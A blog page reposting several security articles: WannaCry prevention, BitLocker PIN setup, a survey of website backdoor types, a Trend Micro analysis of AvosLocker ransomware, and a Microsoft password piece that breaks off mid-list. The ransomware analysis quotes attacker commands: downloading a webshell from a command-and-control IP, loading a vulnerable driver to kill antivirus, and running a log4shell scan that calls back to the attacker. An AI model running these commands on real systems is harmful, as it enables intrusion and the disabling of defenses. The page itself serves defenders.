Windows Server Archives - Page 45 of 50 - Appunti dalla rete

Anti-Ransomware Day: What Can We Do to Prevent the Next WannaCry?

This Anti-Ransomware Day, SonicWall looks at how cybersecurity has changed since WannaCry — and what we can do to ensure we never see such a widespread, devastating and preventable attack again.

On May 12, 2017, attackers identified a vulnerability in a Windows device somewhere in Europe — and in the process, set off an attack that would ultimately impact roughly 200,000 victims and over 300,000 endpoints across 150 countries. The devastation wrought by WannaCry caused financial losses of roughly $4 billion before the strain was halted by an unlikely hero just hours later. But perhaps most devastating of all was that it was completely preventable.

To help raise awareness about ransomware strains like WannaCry and the steps needed to combat them, INTERPOL in 2020 teamed up with cybersecurity firm Kaspersky to declare May 12 Anti-Ransomware Day. By taking a few important steps, organizations can help stop the next major ransomware attack, averting the potential for downtime, reputational damage, fines and more.

“Cybercrime and cybersecurity may seem like a complex issue that is difficult to understand unless you are an expert in the field — this is not the case. INTERPOL’s campaign aims to demystify these cyberthreats and offer simple, concrete steps which everybody can take to protect themselves,” INTERPOL’s Director of Cybercrime Craig Jones said.

What’s Changed Since WannaCry?

In the years since the infamous attack, ransomware has continued to grow. In 2021, SonicWall Capture Labs threat researchers recorded 623.3 million ransomware attempts on customers globally. This represents an increase of 105% from 2020’s total and a staggering 232% since 2019.

Ransomware-Five-Year-Look_May2022_Twitter

And while ransomware was a hot topic worldwide due to attacks such as WannaCry and NotPetya, which would begin its own savage trek across the globe just six weeks later, ransomware volume in 2017 was less than a third of what it was in 2021.

Weakened, but Still Wreaking Havoc

While variants such as Ryuk, SamSam and Cerber made up 62% of the ransomware attacks recorded by SonicWall in 2021, WannaCry lives on — and in surprising numbers. By now, five years on, the number of vulnerable Windows systems should be virtually zero. A patch for the EternalBlue vulnerability exploited by WannaCry was released two months prior to the attack, and Microsoft later took the unusual step of also releasing patches for Windows systems that were old and no longer supported.

But in 2020, SonicWall observed 233,000 instances of WannaCry, and in 2021, 100,000 hits were observed — indicating that there are still vulnerable Windows systems in the wild that need to be patched.

We Can Worry … Or Get to Work

What made WannaCry so successful was that many organizations at the time took a set-it-and-forget-it approach to IT, leaving vulnerable hundreds of thousands of endpoints that could otherwise have been patched prior to the attack. But while patching is a crucial part of any cybersecurity strategy, it can’t work alone — there are still a number of other steps organizations need to take to bolster their odds against the next big ransomware attack.

Update: Whenever possible, enable automatic updates on applications and devices on your network — both for operating systems and for any other apps in your ecosystem.
Upgrade: The older an operating system gets, the more malware and other threats are created to target them. Retire any software or hardware that is obsolete or no longer supported by the vendor.
Duplicate: All important data should be backed up to a place inaccessible by attackers. Having adequate and up-to-date backups on hand significantly eases recovery in the event of a ransomware attack.
Educate: A staggering 91% of all cyberattacks start with someone opening a phishing email. Teach employees to be wary any time they receive an email, particularly one with an attachment or link.
Safeguard: By taking the above steps, most attacks can be prevented, but not all. They’re called “best practices” and not “universal practices” for a reason: If any are allowed to lapse — or new methods are found to circumvent them — organizations will need a strong last line of defense. An advanced, multi-layer platform that includes endpoint security, next-gen firewall services, email security and secure mobile access can work to eliminate blind spots and eradicate both known and unknown threats.

“In the past two years, we have seen how cybercriminals have become bolder in using ransomware. Organizations targeted by such attacks are not limited to corporations and governmental organizations — ransomware operators are ready to hit essentially any business regardless of size,” Jones said. “To fight them, we need to educate ourselves on how they work and fight them as one. Anti-Ransomware Day is a good opportunity to highlight this need and remind the public of how important it is to adopt effective security practices.”

Source :
https://blog.sonicwall.com/en-us/2022/05/anti-ransomware-day-what-can-we-do-to-prevent-the-next-wannacry/

How to Enable a Pre-Boot BitLocker PIN on Windows

If you encrypt your Windows system drive with BitLocker, you can add a PIN for additional security. You’ll need to enter the PIN each time you turn on your PC, before Windows will even start. This is separate from a login PIN, which you enter after Windows boots up.

A pre-boot PIN prevents the encryption key from automatically being loaded into system memory during the boot process, which protects against direct memory access (DMA) attacks on systems with hardware vulnerable to them. Microsoft’s documentation explains this in more detail.

Step One: Enable BitLocker (If You Haven’t Already)

This is a BitLocker feature, so you have to use BitLocker encryption to set a pre-boot PIN. This is only available on Professional and Enterprise editions of Windows. Before you can set a PIN, you have to enable BitLocker for your system drive.

Note that, if you go out of your way to enable BitLocker on a computer without a TPM, you’ll be prompted to create a startup password that’s used instead of the TPM. The below steps are only necessary when enabling BitLocker on computers with TPMs, which most modern computers have.

If you have a Home version of Windows, you won’t be able to use BitLocker. You may have the Device Encryption feature instead, but this works differently from BitLocker and doesn’t allow you to provide a startup key.

Step Two: Enable the Startup PIN in Group Policy Editor

Once you’ve enabled BitLocker, you’ll need to go out of your way to enable a PIN with it. This requires a Group Policy settings change. To open the Group Policy Editor, press Windows+R, type “gpedit.msc” into the Run dialog, and press Enter.

Head to Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives in the Group Policy window.

Double-click the “Require Additional Authentication at Startup” Option in the right pane.

Select “Enabled” at the top of the window here. Then, click the box under “Configure TPM Startup PIN” and select the “Require Startup PIN With TPM” option. Click “OK” to save your changes.

Step Three: Add a PIN to Your Drive

You can now use the manage-bde command to add the PIN to your BitLocker-encrypted drive.

To do this, launch a Command Prompt window as Administrator. On Windows 10 or 8, right-click the Start button and select “Command Prompt (Admin)”. On Windows 7, find the “Command Prompt” shortcut in the Start menu, right-click it, and select “Run as Administrator”

Run the following command. The below command works on your C: drive, so if you want to require a startup key for another drive, enter its drive letter instead of c: .

manage-bde -protectors -add c: -TPMAndPIN

You’ll be prompted to enter your PIN here. The next time you boot, you’ll be asked for this PIN.

To double-check whether the TPMAndPIN protector was added, you can run the following command:

manage-bde -status

(The “Numerical Password” key protector displayed here is your recovery key.)

How to Change Your BitLocker PIN

To change the PIN in the future, open a Command Prompt window as Administrator and run the following command:

manage-bde -changepin c:

You’ll need to type and confirm your new PIN before continuing.

How to Remove the PIN Requirement

If you change your mind and want to stop using the PIN later, you can undo this change.

First, you’ll need to head to the Group Policy window and change the option back to “Allow Startup PIN With TPM”. You can’t leave the option set to “Require Startup PIN With TPM” or Windows won’t allow you to remove the PIN.

Next, open a Command Prompt window as Administrator and run the following command:

manage-bde -protectors -add c: -TPM

This will replace the “TPMandPIN” requirement with a “TPM” requirement, deleting the PIN. Your BitLocker drive will automatically unlock via your computer’s TPM when you boot.

To check that this completed successfully, run the status command again:

manage-bde -status c:

If you forget the PIN, you’ll need to provide the BitLocker recovery code you should have saved somewhere safe when you enabled BitLocker for your system drive.

Source :
https://www.howtogeek.com/262720/how-to-enable-a-pre-boot-bitlocker-pin-on-windows/

Examining Emerging Backdoors

Next up in our “This didn’t quite make it into the 2021 Threat Report, but is still really cool” series: New backdoors!

Backdoors are a crucial component of a website infection. They allow the attackers ongoing access to the compromised environment and provide them a “foot in the door” to execute their payload. We see many different types of backdoors with varying functionality.

When our malware research team is provided with a new backdoor they need to write what’s called a “signature” to ensure that we detect and remove it in future security scans. Signatures need names, and over the years we’ve developed something of a taxonomy naming system for all of the different malware that we come across.

In this article we’re going to explore all the different categories of signatures for newly-discovered backdoors throughout the year 2021.

How do Backdoors Work?

HTTP requests to websites typically fall into one of the following categories:

POST – sending data to a website
GET – requesting data from a website
COOKIE – data (such as session data) saved from a website
REQUEST – a conjunction of all/any of the three

We see all sorts of different backdoors while cleaning up compromised websites. Sometimes they use one of these types of requests, or a combination of multiple different types.

We’ve broken all newly generated signatures from 2021 down for further analysis into the following categories:

A graph showing the distribution of new backdoor signatures generated in 2021.

Uploaders

By far the most common type of backdoor found in 2021 was an uploader: That is, a PHP script that allows the attackers to upload any file that they want. These malicious files allow anyone with the correct URL path, parameters and (occasionally) access credentials to upload whichever files they want to the web server. Typically, bad actors use these backdoors to upload a webshell, spam directory, dropper, or other type of file giving them full control over the environment.

To avoid detection, attackers are always tweaking their malware by using new methods of obfuscation or concealing backdoors within legitimate-looking images, core files, plugins, or even themes — this can make malicious file uploaders difficult to detect during a casual site review.

Once an attacker has identified a vulnerable environment that they can get a foothold in, planting the uploader is often the next step. After that they have enough access to upload more complicated access points such as a webshell.

Of course there are legitimate uploader scripts, as many websites require functionality to allow users to upload photos or other content to the website. To mitigate risk, secure uploader scripts contain strict rules on how they are able to behave:

Only certain file types/extensions are allowed (usually image, or document files)
May require authorisation cookies to be set
May place files in a restricted directory with PHP execution disabled
May disable direct access and instead need to be called by the existing CMS structure

Malicious uploaders, on the other hand, have no such restrictions as they are designed to upload malicious files and PHP scripts.

WebShells

Webshells are a classic type of malware that have been used by attackers for many years. They are administrative dashboards that give the attacker full access to the files and often provide a large amount of information about the hosting environment including operating system, PHP settings, web server configurations, file management, and SQL connections.

The classic FilesMan shell continues to be very popular with attackers. In 2021 we generated 20 new signatures related to new filesman variants alone, not including hack tools which grab filesman shells from remote servers.

Interestingly, a lot of malicious web shells provide far superior functionality than a lot of file managers provided by web hosting providers.

Misc RCE

Sometimes remote code execution backdoors are a little more complicated, or just rely on more basic/generic $_REQUEST calls. This is a PHP global array that contains the content of GET, POST and COOKIE inputs. The content of these variables could be anything and the attacker can fill them — e.g. with the payload — which is then processed. Sometimes the entire payload code is stored there and only very simple code snippets are injected into legitimate files. Such a snippet only loads and executes the content of these variables.

Other times, RCE backdoors make use of multiple different functions and request types.

Generic

Not falling into any particular category are our collection of “generic” backdoors. They tend to use a mixture of different functions and methods to maintain backdoor access to the environment. Some are heavily obfuscated and others are mostly in plain text, but what unites them is that they don’t rely on any one technique to backdoor the environment in which they reside.

FILE_GET_CONTENTS

The PHP function file_get_contents fetches a local file or remote file. As far as backdoors are concerned, attackers misuse this function to grab malicious files located on other websites or servers and add it to the victim’s website. This allows them to host the actual malicious content elsewhere, while maintaining all of the same functionality on the victim environment.

Here we have a very simple backdoor using file_get_contents to grab a backdoor from a malicious server. The actual address is obfuscated through use of a URL shortening service:

The footprint of this malware is very small as the payload resides elsewhere, but the functionality is potentially huge.

Remote Code Execution Backdoors

Not to be confused with remote code execution vulnerabilities, these backdoors are crafted to take whatever command is issued to it by the attacker and execute it in the victim’s environment. These PHP backdoors are often more complex than uploaders and allow the attackers more leeway in terms of how they can interact with the victim website.

If a request is sent that matches the parameters of the backdoor it will execute whichever command the attacker instructs so long as it doesn’t get blocked by any security software or firewall running within the environment.

Here’s another example of a quite well hidden RCE backdoor in a Magento environment:

A well-hidden RCE backdoor in a Magento environment

Attackers make heavy use of the eval function which executes the command in the victim environment.

FILE_PUT_CONTENTS

These backdoors utilise the PHP function file_put_contents which will write the instructed content to a file on the victim environment.

Here is an example of such a backdoor lodged in a WordPress configuration file wp-config.php:

This backdoor writes the specified malicious content into the file structure of the victim website given the correct parameters in the attacker’s request, allowing them to infect other files on the server with the content of their choice.

cURL

The curl() function facilitates the transmission of data. It can be used maliciously to download remote code which can be executed or directly displayed. This way, malware authors are able to create a small backdoor that only has this curl functionality implemented while the payload itself can be downloaded from a remote source.

It has many uses, and as such can be misused in many ways by attackers. We have seen it used frequently in credit card skimmers to transmit sensitive details to exfiltration destinations. It can also be used in RCE backdoors:

Since the attackers have crafted a backdoor to (mis)use curl, and they control the parameters under which it will function, in this way they are able to send or receive malicious traffic to and from the website, depending on how the backdoor is designed.

Authentication Bypass

These types of backdoors are most often seen in WordPress environments. They are small PHP scripts which allow the attacker to automatically log in to the administrator panel without needing to provide any password.

As long as they include the database configuration file in the script then they are able to set the necessary cookies for authorization, as seen in this example here:

A backdoor which bypasses normal authentication

The existence of such backdoors presents a case that additional authentication requirements should be employed within website environments. Protecting your admin panel with our firewall’s protected page feature is a great way to do this.

If you’re not a user of our firewall there are a lot of other ways that your admin panel can be protected.

Basic RCE via POST

Backdoors that take input through POST requests are quite common and many of the backdoor types that we’ve seen contain such functionality. Some of them, however, are quite small and rely exclusively on POST requests.

The example below shows one such backdoor, coupled with basic password protection to ensure that the backdoor is not used by anybody that does not have access to the password.

A basic remote code execution backdoor which uses POST

Fake Plugins

Another tactic that we’ve seen attackers use is the use of fake plugins. This is frequently used as a payload to deliver spam and malware, since WordPress will load the components present in the ./wp-content/plugins directory.

We’ve also seen attackers use these plugins as backdoors to maintain access to compromised environments.

A fake plugin in a WordPress environment

Since admin panel compromises are a very common attack vector, the usage of fake/malicious backdoor plugins is quite popular with attackers.

System Shell Backdoors

Attackers have also written malware that interacts with the hosting environment itself and will attempt to run shell commands via PHP scripts in the environment. This is not always possible, depending on the security settings of the environment, but here’s an example of one such backdoor:

If system() is disabled in the environment then these will not work, so the functionality of such backdoors will be limited by the security settings in the host.

COOKIE Based Backdoors

Some malware creators use COOKIES as a storage for various data. These can be decryption keys used to decode an otherwise inaccessible payload, or even the entire malicious payload itself.

CREATE_FUNCTION

The create_function() is often used by malware instead of (or in conjunction with) the eval() function to hide the execution of the malicious code. The payload is encapsulated inside the crafted custom function, often with an obfuscated name to make the functionality less clear.

This function is then called somewhere else within the code, and thus the payload is evaluated. Backdoors have been found to abuse this to place their payload back on the infected website after it was removed.

A backdoor which creates a malicious function in the victim environment

RCE via GET

Backdoors have also been seen using GET requests for input, rather than POST requests. In the example below we can see that the backdoor will execute the malicious payload if a GET request contains a certain string.

A remote code execution backdoor which uses GET

This allows the attackers to restrict the usage of the backdoor to only those who know the exact parameters to specify in the malicious GET request to the website. If the correct parameters are given then the backdoor will execute its intended function.

Database Management Backdoors

Most often attackers will misuse tools such as Adminer to insert malicious content into the victim website’s database, but occasionally we have seen them craft their own database management tools. This allows them to insert admin users into the website as well as inject malicious JavaScript into the website content to redirect users to spam or scam websites or steal credit card information from eCommerce environments.

Conclusion & Mitigation Steps

Backdoors play a crucial role for the attackers in a huge number of website compromises. Once the attackers are able to gain a foothold into an environment their goal is to escalate the level of access they have as much as possible. Certain vulnerabilities will provide them access only to certain directories. For example, a subdirectory of the wp-content/uploads area of the file structure.

Often the first thing they will do is place a malicious uploader or webshell into the environment, giving them full control over the rest of the website files. Once that is established they are able to deliver a payload of their choosing.

If default configurations are in place in a standard WordPress/cPanel/WHM configuration a single compromised admin user on a single website can cause the entire environment to be infected. Attackers can move laterally throughout the environment by the use of symlinks even if the file permissions/ownership are configured correctly.

Malicious actors are writing new code daily to try to evade existing security detections. As security analysts and researchers it’s our job to stay on top of the most recent threats and ensure that our tools and monitoring detect it all.

Throughout the year 2021 we added hundreds of new signatures for newly discovered backdoors. I expect we’ll also be adding hundreds more this year.

If you’d like us to help you monitor and secure your website from backdoors and other threats you can sign up for our platform-agnostic website security services.

Source :
https://blog.sucuri.net/2022/05/examining-emerging-backdoors.html

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable anti-virus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.

Infection chain

fig1-avoslocker-ransomware-disables-av-scans-log4shell — Figure 1. AvosLocker infection chain

According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:

fig2-avoslocker-ransomware-disables-av-scans-log4shell — Figure 2. The ADSS exploit abusing CVE-2021-40539

Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used. However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class/code.

Mapping the infection

The ADSS JAVA component (C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server. Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process.

fig3-avoslocker-ransomware-disables-av-scans-log4shell — Figure 3. Remotely executing an HTA file from the C&C server. Screenshots taken from Trend Micro Vison One.

fig4-avoslocker-ransomware-disables-av-scans-log4shell — Figure 4. HTA file connecting to the C&C

A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.

fig5-avoslocker-ransomware-disables-av-scans-log4shell — Figure 5. Obfuscated PowerShell script contains a shellcode

The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >. According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.

fig6-avoslocker-ransomware-disables-av-scans-log4shell — Figure 6. Gather system information

The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.

fig7-avoslocker-ransomware-disables-av-scans-log4shell — Figure 7. Executed with the /domain argument to collect username information

fig8-avoslocker-ransomware-disables-av-scans-log4shell — Figure 8. query user information for session data

The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.

fig9-avoslocker-ransomware-disables-av-scans-log4shell — Figure 9. The PowerShell downloading and installing AnyDeskMSI

We observed that a new user account was created, added to the current domain, and included in the administrator group. This ensures the attacker can have administrative rights to the infected system. The attackers also checked the running processes in the system via TaskList to check for anti-virus processes running in the infiltrated system.

fig10-avoslocker-ransomware-disables-av-scans-log4shell — Figure 10. Creating a new account with admin rights

fig11-avoslocker-ransomware-disables-av-scans-log4shell — Figure 11. Checking for anti-virus processes running

During the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.

fig12-avoslocker-ransomware-disables-av-scans-log4shell — Figure 12. Terminating security products running

Tools and functions

Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products. The tools transferred using AnyDesk are:

Netscan: To scan for other endpoints
Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints
Hacking tools Mimikatz and Impacket: For lateral movement
PDQ deploy: For mass deployment of malicious script to multiple endpoints
Aswarpot.sys: For disabling defense solutions. We noted that it can disable a number of anti-virus products, previously identified by Aon’s researchers.

fig13-avoslocker-ransomware-disables-av-scans-log4shell — Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk

We found an Avast anti-rootkit driver installed as service ‘asWarPot.sys’ using the command sc.exe create aswSP_ArPot2 binPath= C:\windows\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running anti-virus product. We noted the unusual use of cmd.exe for execution of the file.

fig14-avoslocker-ransomware-disables-av-scans-log4shell — Figure 14. Executing the anti-rootkit driver in the system

Mimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were detected and deleted.

fig15-avoslocker-ransomware-disables-av-scans-log4shell — Figure 15. Detecting and deleting Mimikatz

We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.

fig16-avoslocker-ransomware-disables-av-scans-log4shell — Figure 16. Listing and terminating the security products found running in the compromised system

Verification: Manual replication of anti-virus disabling routine

We manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure 17 shows the list of processes that the routine searches on infection :

EndpointBasecamp.exe
Trend Micro Endpoint Basecamp
ResponseService.exe
PccNTMon.exe
SupportConnector.exe
AOTAgent.exe
CETASvc.exe
CETASvc
iVPAgent.exe
tmwscsvc.exe
TMResponse
AOTAgentSvc
TMBMServer
iVPAgent
Trend Micro Web Service Communicator
Tmccsf
Tmlisten
Ntrtscan
TmWSCSvc

fig17-avoslocker-ransomware-disables-av-scans-log4shell — Figure 17. Searching for processes

We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.

fig18-avoslocker-ransomware-disables-av-scans-log4shell — Figure 18. Driver file preparing to disable an anti-virus product

The DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.

fig19-avoslocker-ransomware-disables-av-scans-log4shell — Figure 19. DeviceIoControl as an argument with the current process ID

Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.

fig20-avoslocker-ransomware-disables-av-scans-log4shell — Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).

Other executions and lateral movement

After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.

fig21-avoslocker-ransomware-disables-av-scans-log4shell — Figure 21. Execution of Mimikatz (above) and Impacket via C:\temp\wmiexec.exe (below)

We also observed the execution of a password recovery tool XenArmor with C:\temp\pass\start.exe.

fig22-avoslocker-ransomware-disables-av-scans-log4shell — Figure 22. XenArmor password recovery tool execution

We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network. They used the command nmap –script log4shell.nse –script-args log4shell.waf-bypass=true –script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server.

fig23-avoslocker-ransomware-disables-av-scans-log4shell — Figure 23. Checking for log4shell

We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.

fig24-avoslocker-ransomware-disables-av-scans-log4shell — Figure 24. Running more system network configuration discovery scans

Deploying across the network

We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.

fig25-avoslocker-ransomware-disables-av-scans-log4shell — Figure 25. Deploying malicious batch scripts to other endpoints

The deployed batch script has the following commands:

Disable Windows Update and Microsoft Defender

fig26-avoslocker-ransomware-disables-av-scans-log4shell — Figure 26. Disable Microsoft defense services

Prevents safeboot execution of security products

fig27-avoslocker-ransomware-disables-av-scans-log4shell — Figure 27. Prevent security products’ execution

Create new administrator account

fig28-avoslocker-ransomware-disables-av-scans-log4shell — Figure 28. Create new account

Add the AutoStart mechanism for the AvosLocker executable (update.exe)

fig29-avoslocker-ransomware-disables-av-scans-log4shell — Figure 29. Add Autostart for ransomware executable

Disables legal notice caption

fig30-avoslocker-ransomware-disables-av-scans-log4shell — Figure 30. Disable legal notice

Set safeboot with networking and disables Windows Error Recovery and reboot

fig31-avoslocker-ransomware-disables-av-scans-log4shell — Figure 31. Setting and disabling network and specific Windows functions

Conclusion

While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).

This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice. Other modern ransomware, such as Mespinoza/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.

Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.

However, and specific to this instance, the attempt to kill an anti-virus product such as this variant’s TaskKill can also be foiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.

Avast responded to our notification with this statement:

“We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can’t be loaded to memory.

The below example shows that the blocking works (output from the “sc start” command):

(SC) StartService FAILED 1275:

This driver has been blocked from loading

The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft’s security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.

All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.

For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.”

Indicators of Compromise (IOCs)

File	SHA256	Detection
Malicious batch file component	a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15	Trojan.BAT.KILLAV.YACAA
AvosLocker executable	05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5	Ransom.Win32.AVOSLOCKER.SMYXBLNT
Mimikatz executable (x32 and x64)	912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9	HackTool.Win64.MIMIKATZ.ZTJA
e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98	HackTool.Win32.Mimikatz.CNFW
Log4shell Nmap NSE script	ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96	Backdoor.Win32.CVE202144228.YACAH
Impacket tool	14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8	HackTool.Win32.Impacket.AA

Source :
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

This World Password Day consider ditching passwords altogether

Did you know that May 5, 2022, is World Password Day?¹ Created by cybersecurity professionals in 2013 and designated as the first Thursday every May, World Password Day is meant to foster good password habits that help keep our online lives secure. It might seem strange to have a day set aside to honor something almost no one wants to deal with—like having a holiday for filing your income taxes (actually, that might be a good idea). But in today’s world of online work, school, shopping, healthcare, and almost everything else, keeping our accounts secure is more important than ever. Passwords are not only hard to remember and keep track of, but they’re also one of the most common entry points for attackers. In fact, there are 921 password attacks every second—nearly doubling in frequency over the past 12 months.²

But what if you didn’t have to deal with passwords at all? Last fall, we announced that anyone can completely remove the password from their Microsoft account. If you’re like me and happy to ditch passwords completely, read on to learn how Microsoft is making it possible to start enjoying a passwordless life today. Still, we know not everyone is ready to say goodbye to passwords, and it’s not possible for all your online accounts. We’ll also go over some easy ways to improve your password hygiene, as well as share some exciting news from our collaboration with the FIDO Alliance about a new way to sign in without a password.

Free yourself with passwordless sign-in

Yes, you can now enjoy secure access to your Microsoft account without a password. By using the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email, you can go passwordless with any of your Microsoft apps and services. Just follow these five steps:

Download and install Microsoft Authenticator (linked to your personal Microsoft account).
Sign in to your Microsoft account.
Choose Security. Under Advanced security options, you’ll see Passwordless account in the section titled Additional security.
Select Turn on.
Approve the notification from Authenticator.

User interface of Microsoft Authenticator app providing instructions on how to turn on passwordless account option.

Notification from Microsoft Authenticator app confirming user's password has been removed.

Once you approve the notification, you’ll no longer need a password to access your Microsoft accounts. If you decide you prefer using a password, you can always go back and turn off the passwordless feature. Here at Microsoft, nearly 100 percent of our employees use passwordless options to log into their corporate accounts.

Strengthen security with multifactor authentication

One simple step we can all take to protect our accounts today is adding multifactor authentication, which blocks 99.9 percent of account compromise attacks. The Microsoft Authenticator app is free and provides multiple options for authentication, including time-based one-time passcodes (TOTP), push notifications, and passwordless sign-in—all of which work for any site that supports multifactor authentication. Authenticator is available for Android and iOS and gives you the option to turn two-step verification on or off. For your Microsoft Account, multifactor authentication is usually only needed the first time you sign in or after changing your password. Once your device is recognized, you’ll just need your primary sign-in.

Microsoft Authenticator screen showing different accounts, including: Microsoft, Contoso Corporation, and Facebook.

Make sure your password isn’t the weak link

Rather than keeping attackers out, weak passwords often provide a way in. Using and reusing simple passwords across different accounts might make our online life easier, but it also leaves the door open. Attackers regularly scroll social media accounts looking for birthdates, vacation spots, pet names and other personal information they know people use to create easy-to-remember passwords. A recent study found that 68 percent of people use the same password for different accounts.³ For example, once a password and email combination has been compromised, it’s often sold on the dark web for use in additional attacks. As my friend Bret Arsenault, our Chief Information Security Officer (CISO) here at Microsoft, likes to say, “Hackers don’t break in, they log in.”

Some basics to remember—make sure your password is:

At least 12 characters long.
A combination of uppercase and lowercase letters, numbers, and symbols.
Not a word that can be found in a dictionary, or the name of a person, product, or organization.
Completely different from your previous passwords.
Changed immediately if you suspect it may have been compromised.

Tip: Consider using a password manager. Microsoft Edge and Microsoft Authenticator can create (and remember) strong passwords using Password Generator, and then automatically fill them in when accessing your accounts. Also, keep these other tips in mind:

Only share personal information in real-time—in person or by phone. (Be careful on social media.)
Be skeptical of messages with links, especially those asking for personal information.
Be on guard against messages with attached files, even from people or organizations you trust.
Enable the lock feature on all your mobile devices (fingerprint, PIN, or facial recognition).
Ensure all the apps on your device are legitimate (only from your device’s official app store).
Keep your browser updated, browse in incognito mode, and enable Pop-Up Blocker.
Use Windows 11 and turn on Tamper Protection to protect your security settings.

Tip: When answering security questions, provide an unrelated answer. For example, Q: “Where were you born?” A: “Green.” This helps throw off attackers who might use information skimmed from your social media accounts to hack your passwords. (Just be sure the unrelated answers are something you’ll remember.)

Passwordless authentication is becoming commonplace

As part of a historic collaboration, the FIDO Alliance, Microsoft, Apple, and Google have announced plans to expand support for a common passwordless sign-in standard. Commonly referred to as passkeys, these multi-device FIDO credentials offer users a platform-native way to safely and quickly sign in to any of their devices without a password. Virtually unable to be phished and available across all your devices, a passkey lets you sign in simply by authenticating with your face, fingerprint, or device PIN.

In addition to a consistent user experience and enhanced security, these new credentials offer two other compelling benefits:

Users can automatically access their passkeys on many of their devices without having to re-enroll for each account. Simply authenticate with your platform on your new device and your passkeys will be there ready to use—protecting you against device loss and simplifying device upgrade scenarios.
